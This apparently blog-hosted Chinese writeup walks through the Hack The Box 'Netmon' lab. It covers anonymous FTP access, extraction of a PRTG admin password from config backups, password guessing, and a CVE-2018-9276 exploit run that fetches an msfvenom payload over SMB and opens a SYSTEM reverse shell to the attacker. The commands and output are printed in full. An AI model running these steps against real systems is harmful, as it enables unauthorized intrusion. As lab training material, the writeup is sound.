Netmon-htb-writeup

0x00 靶场技能介绍

章节技能:匿名FTP访问、PRTG Network Monitor备份文件下载、密码规律识别、CVE-2018-9276

参考链接:无

0x01 用户权限获取

1、获取下靶机IP地址:10.10.10.152

2、获取下开放端口情况:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo nmap -p- --min-rate=10000 -oG allports 10.10.10.152
[sudo] kali 的密码:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-20 23:58 CST
Warning: 10.10.10.152 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.10.10.152
Host is up (0.29s latency).
Not shown: 65338 closed tcp ports (reset), 184 filtered tcp ports (no-response)
PORT STATE SERVICE
21/tcp open ftp
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
5985/tcp open wsman
47001/tcp open winrm
49664/tcp open unknown
49665/tcp open unknown
49666/tcp open unknown
49667/tcp open unknown
49668/tcp open unknown
49669/tcp open unknown

Nmap done: 1 IP address (1 host up) scanned in 27.47 seconds

┌──(kali㉿offsec)-[~/Desktop]
└─$ grep -oP '([0-9]+/open)' allports | awk -F/ '{print $1}' | tr '\n' ','
21,80,135,139,445,5985,47001,49664,49665,49666,49667,49668,49669,

┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo nmap -p21,80,135,139,445,5985,47001,49664,49665,49666,49667,49668,49669 --min-rate=10000 -sC -sV 10.10.10.152
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-21 00:04 CST
Nmap scan report for 10.10.10.152
Host is up (0.50s latency).

PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-syst:
|_ SYST: Windows_NT
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 02-03-19 12:18AM 1024 .rnd
| 02-25-19 10:15PM <DIR> inetpub
| 07-16-16 09:18AM <DIR> PerfLogs
| 02-25-19 10:56PM <DIR> Program Files
| 02-03-19 12:28AM <DIR> Program Files (x86)
| 02-03-19 08:08AM <DIR> Users
|_11-10-23 10:20AM <DIR> Windows
80/tcp open http Indy httpd 18.1.37.13946 (Paessler PRTG bandwidth monitor)
|_http-server-header: PRTG/18.1.37.13946
|_http-trane-info: Problem with XML parsing of /evox/about
| http-title: Welcome | PRTG Network Monitor (NETMON)
|_Requested resource was /index.htm
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
| smb-security-mode:
| account_used: <blank>
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-time:
| date: 2024-05-20T08:00:46
|_ start_date: 2024-05-20T07:46:36
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
|_clock-skew: mean: -8h04m35s, deviation: 1s, median: -8h04m36s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 88.80 seconds

3、经过枚举,发现这直接可以通过匿名FTP服务,获取到第一个flag信息,而且是预期的获取方法

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
┌──(kali㉿offsec)-[~/Desktop]
└─$ ftp anonymous@10.10.10.152
Connected to 10.10.10.152.
220 Microsoft FTP Service
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> ls
229 Entering Extended Passive Mode (|||50148|)
150 Opening ASCII mode data connection.
02-03-19 12:18AM 1024 .rnd
02-25-19 10:15PM <DIR> inetpub
07-16-16 09:18AM <DIR> PerfLogs
02-25-19 10:56PM <DIR> Program Files
02-03-19 12:28AM <DIR> Program Files (x86)
02-03-19 08:08AM <DIR> Users
11-10-23 10:20AM <DIR> Windows
226 Transfer complete.
ftp> cd Users
250 CWD command successful.
ftp> ls
229 Entering Extended Passive Mode (|||50151|)
150 Opening ASCII mode data connection.
02-25-19 11:44PM <DIR> Administrator
01-15-24 11:03AM <DIR> Public
226 Transfer complete.
ftp> cd Public
250 CWD command successful.
ftp> ls
229 Entering Extended Passive Mode (|||50159|)
150 Opening ASCII mode data connection.
01-15-24 11:03AM <DIR> Desktop
02-03-19 08:05AM <DIR> Documents
07-16-16 09:18AM <DIR> Downloads
07-16-16 09:18AM <DIR> Music
07-16-16 09:18AM <DIR> Pictures
07-16-16 09:18AM <DIR> Videos
226 Transfer complete.
ftp> cd Desktop
250 CWD command successful.
ftp> ls
229 Entering Extended Passive Mode (|||50160|)
150 Opening ASCII mode data connection.
02-03-19 12:18AM 1195 PRTG Enterprise Console.lnk
02-03-19 12:18AM 1160 PRTG Network Monitor.lnk
05-20-24 03:47AM 34 user.txt
226 Transfer complete.
ftp> get user.txt
local: user.txt remote: user.txt
229 Entering Extended Passive Mode (|||50161|)
150 Opening ASCII mode data connection.
100% |*******************************************************************************************************************************************| 34 0.05 KiB/s 00:00 ETA
226 Transfer complete.
34 bytes received in 00:00 (0.05 KiB/s)
ftp> exit
221 Goodbye.

┌──(kali㉿offsec)-[~/Desktop]
└─$ cat user.txt
d4009d1ebd454aa898027a1ae7c10e4a

0x02 系统权限获取

4、开始访问80端口服务

http://10.10.10.152/index.htm

5、尝试网上的默认口令也不对,应该是修改了密码了,开始直接搜索可以未授权的RCE漏洞

https://github.com/A1vinSmith/CVE-2018-9276

https://kb.paessler.com/en/topic/463-how-and-where-does-prtg-store-its-data

%programdata%\Paessler\PRTG Network Monitor

6、经过初步的枚举,发现了一个压缩包文件,也获取到了里面的密文

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
┌──(kali㉿offsec)-[~/Desktop]
└─$ ftp anonymous@10.10.10.152
Connected to 10.10.10.152.
220 Microsoft FTP Service
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:

230 User logged in.
Remote system type is Windows_NT.
ftp>
ftp> ls
229 Entering Extended Passive Mode (|||50252|)
150 Opening ASCII mode data connection.
02-03-19 12:18AM 1024 .rnd
02-25-19 10:15PM <DIR> inetpub
07-16-16 09:18AM <DIR> PerfLogs
02-25-19 10:56PM <DIR> Program Files
02-03-19 12:28AM <DIR> Program Files (x86)
02-03-19 08:08AM <DIR> Users
11-10-23 10:20AM <DIR> Windows
226 Transfer complete.
ftp> cd programdata
250 CWD command successful.
ftp> ls
229 Entering Extended Passive Mode (|||50262|)
125 Data connection already open; Transfer starting.
12-15-21 10:40AM <DIR> Corefig
02-03-19 12:15AM <DIR> Licenses
11-20-16 10:36PM <DIR> Microsoft
02-03-19 12:18AM <DIR> Paessler
02-03-19 08:05AM <DIR> regid.1991-06.com.microsoft
07-16-16 09:18AM <DIR> SoftwareDistribution
02-03-19 12:15AM <DIR> TEMP
11-20-16 10:19PM <DIR> USOPrivate
11-20-16 10:19PM <DIR> USOShared
02-25-19 10:56PM <DIR> VMware
226 Transfer complete.
ftp> cd Paessler
250 CWD command successful.
ftp> ls
229 Entering Extended Passive Mode (|||50272|)
150 Opening ASCII mode data connection.
05-20-24 05:10AM <DIR> PRTG Network Monitor
226 Transfer complete.
ftp> cd "PRTG Network Monitor"
250 CWD command successful.
ftp> ls
229 Entering Extended Passive Mode (|||50273|)
150 Opening ASCII mode data connection.
08-18-23 08:20AM <DIR> Configuration Auto-Backups
05-20-24 05:10AM <DIR> Log Database
02-03-19 12:18AM <DIR> Logs (Debug)
02-03-19 12:18AM <DIR> Logs (Sensors)
02-03-19 12:18AM <DIR> Logs (System)
05-20-24 05:10AM <DIR> Logs (Web Server)
01-15-24 11:03AM <DIR> Monitoring Database
02-25-19 10:54PM 1189697 PRTG Configuration.dat
02-25-19 10:54PM 1189697 PRTG Configuration.old
07-14-18 03:13AM 1153755 PRTG Configuration.old.bak
05-20-24 05:10AM 1647093 PRTG Graph Data Cache.dat
02-25-19 11:00PM <DIR> Report PDFs
02-03-19 12:18AM <DIR> System Information Database
02-03-19 12:40AM <DIR> Ticket Database
02-03-19 12:18AM <DIR> ToDo Database
226 Transfer complete.
ftp> cd "Configuration Auto-Backups"
250 CWD command successful.
ftp> ls
229 Entering Extended Passive Mode (|||50285|)
150 Opening ASCII mode data connection.
08-18-23 08:20AM 64004 PRTG Configuration (Update to 18.1.37.13946).zip
226 Transfer complete.
ftp> get "PRTG Configuration (Update to 18.1.37.13946).zip"
local: PRTG Configuration (Update to 18.1.37.13946).zip remote: PRTG Configuration (Update to 18.1.37.13946).zip
229 Entering Extended Passive Mode (|||50315|)
125 Data connection already open; Transfer starting.
100% |*******************************************************************************************************************************************| 64004 67.31 KiB/s 00:00 ETA
226 Transfer complete.
WARNING! 223 bare linefeeds received in ASCII mode.
File may not have transferred correctly.
64004 bytes received in 00:00 (67.28 KiB/s)
ftp>

<login>
prtgadmin
</login>
<name>
PRTG System Administrator
</name>
<ownerid>
100
</ownerid>
<password>
<flags>
<encrypted/>
</flags>
<cell col="0" crypt="PRTG">
JO3Y7LLK7IBKCMDN3DABSVAQO5MR5IDWF3MJLDOWSA======
</cell>
<cell col="1" crypt="PRTG">
OEASMEIE74Q5VXSPFJA2EEGBMEUEXFWW
</cell>
</password>

7、这里尝试使用 https://github.com/yobabyte/decryptocollection 工具去解密,发现无法解密。这里的VPN网是真的不行,太卡了,各种掉线。。。。。。。。。

8、换一个方法下载,图形目录下载,这里是根据上面的路径,进行获取配置文件

1
2
3
4
5
6
7
8
┌──(kali㉿offsec)-[~/Desktop/config]
└─$ tree
.
├── PRTG Configuration.dat
├── PRTG Configuration.old
└── PRTG Configuration.old.bak

1 directory, 3 files

9、开始分析这些配置文件

PRTG Configuration.dat

PRTG Configuration.old

PRTG Configuration.old.bak

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
<!-- User: prtgadmin -->
PrTg@dmin2018



<login>
prtgadmin
</login>
<name>
PRTG System Administrator
</name>
<ownerid>
100
</ownerid>
<password>
<flags>
<encrypted/>
</flags>
<cell col="0" crypt="PRTG">
PDWXMOPZT43U2GKGR3YCBILXDMLAUZVBN27KGBOPKXRQ====
</cell>
<cell col="1" crypt="PRTG">
M24VKFRECBEGN3ZQNGSET723GFIPVHYX
</cell>
</password>

10、这里发现了明文的密码信息,尝试进行登录,但是失败了

1
2
user: prtgadmin
pwd: PrTg@dmin2018

11、经过分析,发现密码后面是年费结尾,结合靶机是2019年出的,是否可以递增一下进行尝试

1
2
prtgadmin
PrTg@dmin2019

http://10.10.10.152/welcome.htm

12、成功登录,那就直接上EXP了,不手动操作了

https://github.com/A1vinSmith/CVE-2018-9276

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
┌──(kali㉿offsec)-[~/Desktop]
└─$ python3 exp.py -i 10.10.10.152 -p 80 --lhost 10.10.14.45 --lport 443 --user prtgadmin --password PrTg@dmin2019
[+] [PRTG/18.1.37.13946] is Vulnerable!

[*] Exploiting [10.10.10.152:80] as [prtgadmin/PrTg@dmin2019]
[+] Session obtained for [prtgadmin:PrTg@dmin2019]
[+] File staged at [C:\Users\Public\tester.txt] successfully with objid of [2018]
[+] Session obtained for [prtgadmin:PrTg@dmin2019]
[+] Notification with objid [2018] staged for execution
[*] Generate msfvenom payload with [LHOST=10.10.14.45 LPORT=443 OUTPUT=/tmp/tbfvtymv.dll]
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 324 bytes
Final size of dll file: 9216 bytes
/home/kali/Desktop/exp.py:294: DeprecationWarning: setName() is deprecated, set the name attribute instead
impacket.setName('Impacket')
/home/kali/Desktop/exp.py:295: DeprecationWarning: setDaemon() is deprecated, set the daemon attribute instead
impacket.setDaemon(True)
[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Hosting payload at [\\10.10.14.45\MMIRDVSR]
[+] Session obtained for [prtgadmin:PrTg@dmin2019]
[+] Command staged at [C:\Users\Public\tester.txt] successfully with objid of [2019]
[+] Session obtained for [prtgadmin:PrTg@dmin2019]
[+] Notification with objid [2019] staged for execution
[*] Attempting to kill the impacket thread
[-] Impacket will maintain its own thread for active connections, so you may find it's still listening on <LHOST>:445!
[-] ps aux | grep <script name> and kill -9 <pid> if it is still running :)
[-] The connection will eventually time out.

[+] Listening on [10.10.14.45:443 for the reverse shell!]
listening on [any] 443 ...
[*] Incoming connection (10.10.10.152,50344)
[*] AUTHENTICATE_MESSAGE (\,NETMON)
[*] User NETMON\ authenticated successfully
[*] :::00::aaaaaaaaaaaaaaaa
connect to [10.10.14.45] from (UNKNOWN) [10.10.10.152] 50345
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

C:\Windows\system32>
C:\Windows\system32>whoami
whoami
nt authority\system

13、不赖,这个EXP直接给提权了啊,那就读取最终的flag吧

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
C:\Windows\system32>cd C:/Users/Administrator/Desktop/
cd C:/Users/Administrator/Desktop/

C:\Users\Administrator\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is 0EF5-E5E5

Directory of C:\Users\Administrator\Desktop

02/03/2019 12:35 AM <DIR> .
02/03/2019 12:35 AM <DIR> ..
05/20/2024 08:21 AM 34 root.txt
1 File(s) 34 bytes
2 Dir(s) 6,732,656,640 bytes free

C:\Users\Administrator\Desktop>type root.txt
type root.txt
38a3446085fad5ca871f1781548a758b

C:\Users\Administrator\Desktop>

0x03 通关凭证展示

https://www.hackthebox.com/achievement/machine/1705469/177


Netmon-htb-writeup
https://sh1yan.top/2024/05/21/Netmon-htb-writeup/
作者
shiyan
发布于
2024年5月21日
许可协议